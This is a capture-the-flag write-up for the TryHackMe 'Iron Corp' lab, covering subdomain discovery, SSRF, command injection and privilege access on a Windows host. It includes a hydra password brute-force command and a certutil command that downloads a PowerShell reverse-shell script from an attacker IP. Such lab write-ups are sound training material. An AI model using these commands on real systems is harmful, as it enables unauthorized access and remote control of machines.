Iron Corp

https://tryhackme.com/room/ironcorp

The asset in scope is: ironcorp.me

Note: Edit your config file and add ironcorp.me

User flag

Let's start with port enumeration.

We see there's a few open ports. We'll check the http ones first (80, 11025)

After a while looking around and enumerating directories we found nothing really interesting, so let's move to the next port.

Same thing. Nothing really interesting comes out. Maybe it's time to check the other ports.

We saw port 53 was open. So maybe we can get some subdomains out of it using dig:

Pretty interesting. Let's add them to the hosts file and check whats inside.

We don't have access to the internal page and the admin one asks for credentials. Let's try to brute force them using hydra:

hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 1 -f admin.ironcorp.me -s 11025 http-get / -v

We got inside. Let's take a look.

One of the tags of the box mentioned "SSRF" so let's see if we set up a server and use it as a parameter we get something (r=http://ip/test.txt)

Now we can try to do the same with the internal subdomain and see if we can bypass the forbidden access,

Let's try with that url.

We can try to command injection. After a few tries we see we can use "|" to escape the shell.

So now we can try to upload a rev shell to the victim machine and execute it. We'll use the famous "Invoke-PowershellTcp.ps1" powershell script.

certutil.exe -urlcache -f http://10.10.10.10/Invoke-PowershellTcp.ps1 Invoke-PowershellTcp.ps1

I don't know why but we had to url encode the command twice for it to work.

Once we upload the script let's execute (We could've used a one liner to download and execute it too)

PowerShell -File Invoke-PowershellTcp.ps1

(Same thing as before, we have to double encode it)

Nice, we're in. Let's check our privileges.

nt authority\system. This can't get any better. Let's grab the flag.

Root Flag

If we look around we see we don't have access to the SuperAdmin folder. Usually on thm the root flags are on the desktop folder, so what will happen if we tried to read it directly?

We got it. But probably this wasn't the intended path. So what can we do next? Let's check the folder permissions.

Now we can check our privileges.

We could upgrade to a meterpreter shell, load incognito and impersonate the right token to get access to that folder.